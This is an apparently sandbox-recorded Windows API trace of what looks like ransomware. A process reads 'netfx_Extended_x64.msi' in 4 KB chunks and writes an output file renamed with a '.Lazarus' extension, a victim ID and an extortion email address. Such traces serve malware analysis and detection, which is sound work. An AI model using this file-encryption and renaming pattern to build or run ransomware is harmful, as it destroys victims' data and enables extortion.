lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000)) returned 1 [0076.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0076.738] AreFileApisANSI () returned 1 [0076.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0076.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0076.738] GetLastError () returned 0x0 [0076.738] SetLastError (dwErrCode=0x0) [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e030 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x92460 [0076.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0076.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0076.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0076.739] GetLastError () returned 0x0 [0076.739] SetLastError (dwErrCode=0x0) [0076.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0076.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0076.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x715b8 [0076.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0076.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a6f8 [0076.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0076.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0076.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0076.739] AreFileApisANSI () returned 1 [0076.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a6f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0076.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0076.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a6f8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0076.739] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.744] GetFileType (hFile=0x42c) returned 0x1 [0076.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0076.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0076.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0076.744] AreFileApisANSI () returned 1 [0076.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0076.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0076.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 45 [0076.744] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0076.744] GetFileType (hFile=0x428) returned 0x1 [0076.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0076.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0076.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0076.745] GetLastError () returned 0x0 [0076.745] SetLastError (dwErrCode=0x0) [0076.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0076.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0076.745] GetLastError () returned 0x0 [0076.745] SetLastError (dwErrCode=0x0) [0076.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0076.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0076.745] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0076.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0076.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0076.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.747] GetLastError () returned 0x0 [0076.747] SetLastError (dwErrCode=0x0) [0076.747] GetLastError () returned 0x0 [0076.747] SetLastError (dwErrCode=0x0) [0076.747] GetLastError () returned 0x0 [0076.748] SetLastError (dwErrCode=0x0) [0076.748] GetLastError () returned 0x0 [0076.748] SetLastError (dwErrCode=0x0) [0076.748] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.748] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.750] GetLastError () returned 0x0 [0076.750] SetLastError (dwErrCode=0x0) [0076.750] GetLastError () returned 0x0 [0076.750] SetLastError (dwErrCode=0x0) [0076.750] GetLastError () returned 0x0 [0076.750] SetLastError (dwErrCode=0x0) [0076.750] GetLastError () returned 0x0 [0076.750] SetLastError (dwErrCode=0x0) [0076.750] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.750] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.750] GetLastError () returned 0x0 [0076.750] SetLastError (dwErrCode=0x0) [0076.751] GetLastError () returned 0x0 [0076.751] SetLastError (dwErrCode=0x0) [0076.751] GetLastError () returned 0x0 [0076.751] SetLastError (dwErrCode=0x0) [0076.751] GetLastError () returned 0x0 [0076.751] SetLastError (dwErrCode=0x0) [0076.751] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.751] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.751] GetLastError () returned 0x0 [0076.751] SetLastError (dwErrCode=0x0) [0076.751] GetLastError () returned 0x0 [0076.752] SetLastError (dwErrCode=0x0) [0076.752] GetLastError () returned 0x0 [0076.752] SetLastError (dwErrCode=0x0) [0076.752] GetLastError () returned 0x0 [0076.752] SetLastError (dwErrCode=0x0) [0076.752] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.752] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.752] GetLastError () returned 0x0 [0076.752] SetLastError (dwErrCode=0x0) [0076.752] GetLastError () returned 0x0 [0076.752] SetLastError (dwErrCode=0x0) [0076.753] GetLastError () returned 0x0 [0076.753] SetLastError (dwErrCode=0x0) [0076.753] GetLastError () returned 0x0 [0076.753] SetLastError (dwErrCode=0x0) [0076.753] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.753] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.753] GetLastError () returned 0x0 [0076.753] SetLastError (dwErrCode=0x0) [0076.753] GetLastError () returned 0x0 [0076.753] SetLastError (dwErrCode=0x0) [0076.753] GetLastError () returned 0x0 [0076.753] SetLastError (dwErrCode=0x0) [0076.754] GetLastError () returned 0x0 [0076.754] SetLastError (dwErrCode=0x0) [0076.754] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.754] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.754] GetLastError () returned 0x0 [0076.754] SetLastError (dwErrCode=0x0) [0076.754] GetLastError () returned 0x0 [0076.754] SetLastError (dwErrCode=0x0) [0076.754] GetLastError () returned 0x0 [0076.754] SetLastError (dwErrCode=0x0) [0076.754] GetLastError () returned 0x0 [0076.754] SetLastError (dwErrCode=0x0) [0076.755] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.755] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.755] GetLastError () returned 0x0 [0076.755] SetLastError (dwErrCode=0x0) [0076.755] GetLastError () returned 0x0 [0076.755] SetLastError (dwErrCode=0x0) [0076.755] GetLastError () returned 0x0 [0076.755] SetLastError (dwErrCode=0x0) [0076.755] GetLastError () returned 0x0 [0076.755] SetLastError (dwErrCode=0x0) [0076.755] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.756] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.756] GetLastError () returned 0x0 [0076.756] SetLastError (dwErrCode=0x0) [0076.756] GetLastError () returned 0x0 [0076.756] SetLastError (dwErrCode=0x0) [0076.756] GetLastError () returned 0x0 [0076.756] SetLastError (dwErrCode=0x0) [0076.756] GetLastError () returned 0x0 [0076.756] SetLastError (dwErrCode=0x0) [0076.756] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.756] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.757] GetLastError () returned 0x0 [0076.757] SetLastError (dwErrCode=0x0) [0076.757] GetLastError () returned 0x0 [0076.757] SetLastError (dwErrCode=0x0) [0076.757] GetLastError () returned 0x0 [0076.757] SetLastError (dwErrCode=0x0) [0076.757] GetLastError () returned 0x0 [0076.757] SetLastError (dwErrCode=0x0) [0076.757] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.757] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.758] GetLastError () returned 0x0 [0076.758] SetLastError (dwErrCode=0x0) [0076.758] GetLastError () returned 0x0 [0076.758] SetLastError (dwErrCode=0x0) [0076.758] GetLastError () returned 0x0 [0076.758] SetLastError (dwErrCode=0x0) [0076.758] GetLastError () returned 0x0 [0076.758] SetLastError (dwErrCode=0x0) [0076.758] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.758] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.758] GetLastError () returned 0x0 [0076.758] SetLastError (dwErrCode=0x0) [0076.759] GetLastError () returned 0x0 [0076.759] SetLastError (dwErrCode=0x0) [0076.759] GetLastError () returned 0x0 [0076.759] SetLastError (dwErrCode=0x0) [0076.759] GetLastError () returned 0x0 [0076.759] SetLastError (dwErrCode=0x0) [0076.759] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.760] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.760] GetLastError () returned 0x0 [0076.760] SetLastError (dwErrCode=0x0) [0076.760] GetLastError () returned 0x0 [0076.760] SetLastError (dwErrCode=0x0) [0076.760] GetLastError () returned 0x0 [0076.760] SetLastError (dwErrCode=0x0) [0076.760] GetLastError () returned 0x0 [0076.760] SetLastError (dwErrCode=0x0) [0076.760] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.761] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.761] GetLastError () returned 0x0 [0076.761] SetLastError (dwErrCode=0x0) [0076.761] GetLastError () returned 0x0 [0076.761] SetLastError (dwErrCode=0x0) [0076.761] GetLastError () returned 0x0 [0076.761] SetLastError (dwErrCode=0x0) [0076.761] GetLastError () returned 0x0 [0076.761] SetLastError (dwErrCode=0x0) [0076.761] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.762] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.763] GetLastError () returned 0x0 [0076.763] SetLastError (dwErrCode=0x0) [0076.763] GetLastError () returned 0x0 [0076.763] SetLastError (dwErrCode=0x0) [0076.763] GetLastError () returned 0x0 [0076.763] SetLastError (dwErrCode=0x0) [0076.763] GetLastError () returned 0x0 [0076.763] SetLastError (dwErrCode=0x0) [0076.764] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.764] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.764] GetLastError () returned 0x0 [0076.764] SetLastError (dwErrCode=0x0) [0076.764] GetLastError () returned 0x0 [0076.764] SetLastError (dwErrCode=0x0) [0076.764] GetLastError () returned 0x0 [0076.764] SetLastError (dwErrCode=0x0) [0076.764] GetLastError () returned 0x0 [0076.764] SetLastError (dwErrCode=0x0) [0076.764] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.765] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.765] GetLastError () returned 0x0 [0076.765] SetLastError (dwErrCode=0x0) [0076.765] GetLastError () returned 0x0 [0076.765] SetLastError (dwErrCode=0x0) [0076.765] GetLastError () returned 0x0 [0076.765] SetLastError (dwErrCode=0x0) [0076.765] GetLastError () returned 0x0 [0076.765] SetLastError (dwErrCode=0x0) [0076.765] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.765] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.766] GetLastError () returned 0x0 [0076.766] SetLastError (dwErrCode=0x0) [0076.766] GetLastError () returned 0x0 [0076.766] SetLastError (dwErrCode=0x0) [0076.766] GetLastError () returned 0x0 [0076.766] SetLastError (dwErrCode=0x0) [0076.766] GetLastError () returned 0x0 [0076.766] SetLastError (dwErrCode=0x0) [0076.766] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.766] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.767] GetLastError () returned 0x0 [0076.767] SetLastError (dwErrCode=0x0) [0076.767] GetLastError () returned 0x0 [0076.767] SetLastError (dwErrCode=0x0) [0076.767] GetLastError () returned 0x0 [0076.767] SetLastError (dwErrCode=0x0) [0076.767] GetLastError () returned 0x0 [0076.767] SetLastError (dwErrCode=0x0) [0076.767] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.767] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.767] GetLastError () returned 0x0 [0076.767] SetLastError (dwErrCode=0x0) [0076.768] GetLastError () returned 0x0 [0076.768] SetLastError (dwErrCode=0x0) [0076.768] GetLastError () returned 0x0 [0076.768] SetLastError (dwErrCode=0x0) [0076.768] GetLastError () returned 0x0 [0076.768] SetLastError (dwErrCode=0x0) [0076.768] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.768] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.768] GetLastError () returned 0x0 [0076.768] SetLastError (dwErrCode=0x0) [0076.768] GetLastError () returned 0x0 [0076.768] SetLastError (dwErrCode=0x0) [0076.769] GetLastError () returned 0x0 [0076.769] SetLastError (dwErrCode=0x0) [0076.769] GetLastError () returned 0x0 [0076.769] SetLastError (dwErrCode=0x0) [0076.769] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.769] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.769] GetLastError () returned 0x0 [0076.769] SetLastError (dwErrCode=0x0) [0076.769] GetLastError () returned 0x0 [0076.769] SetLastError (dwErrCode=0x0) [0076.769] GetLastError () returned 0x0 [0076.769] SetLastError (dwErrCode=0x0) [0076.770] GetLastError () returned 0x0 [0076.770] SetLastError (dwErrCode=0x0) [0076.770] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.770] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.770] GetLastError () returned 0x0 [0076.770] SetLastError (dwErrCode=0x0) [0076.770] GetLastError () returned 0x0 [0076.770] SetLastError (dwErrCode=0x0) [0076.770] GetLastError () returned 0x0 [0076.770] SetLastError (dwErrCode=0x0) [0076.770] GetLastError () returned 0x0 [0076.770] SetLastError (dwErrCode=0x0) [0076.771] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.771] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.771] GetLastError () returned 0x0 [0076.771] SetLastError (dwErrCode=0x0) [0076.771] GetLastError () returned 0x0 [0076.771] SetLastError (dwErrCode=0x0) [0076.771] GetLastError () returned 0x0 [0076.771] SetLastError (dwErrCode=0x0) [0076.771] GetLastError () returned 0x0 [0076.771] SetLastError (dwErrCode=0x0) [0076.771] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 